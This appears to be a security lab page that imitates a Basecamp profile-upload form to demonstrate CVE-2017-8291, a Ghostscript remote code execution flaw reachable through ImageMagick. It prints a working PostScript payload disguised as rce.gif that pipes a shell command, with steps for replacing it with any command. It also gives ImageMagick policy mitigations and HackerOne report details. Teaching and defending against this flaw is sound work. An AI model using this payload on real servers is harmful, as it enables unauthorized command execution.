My profile — Basecamp

My stuff › Account settings › My profile

My profile

Profile & picture

0 upload(s)

Edit

Jason Fried

CEO & Co-founder, Basecamp

Upload a profile picture. Accepted file types: .gif, .jpg, .png — processed by ImageMagick.

Download rce.gif

First name

Last name

Email address

Title / Role

Bio (optional)

Making software & bootstrapping companies. Founder & CEO of Basecamp. Co-author of "Getting Real", "Rework", and "Remote".

Attack Flow

1 Click Download rce.gif to get the sample PostScript payload

2 Edit the file — change echo $FLAG to any shell command

3 Click Change picture and upload rce.gif

4 ImageMagick detects %! magic → calls Ghostscript → CVE-2017-8291 fires → shell output shown below

Sample EPS Payload (rce.gif)

%!PS % PostScript/EPS — will be detected by % ImageMagick and passed to Ghostscript userdict /setpagedevice undef { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%echo $FLAG) currentdevice putdeviceprops

Download rce.gif

Mitigation (What Basecamp Fixed)

Disabled the Ghostscript-based PS/PDF coders in ImageMagick security policy:

<policy domain="coder" rights="none" pattern="PS" /> <policy domain="coder" rights="none" pattern="EPS" /> <policy domain="coder" rights="none" pattern="PDF" />

Also: validate magic bytes server-side, not just file extension.

HackerOne Report

Report

#365271

Reporter

gammarex

Severity

Critical (9–10)

Bounty

$5,000

CVE

CVE-2017-8291

Reported

Jun 13, 2018

Disclosed

Nov 26, 2020

Program

Basecamp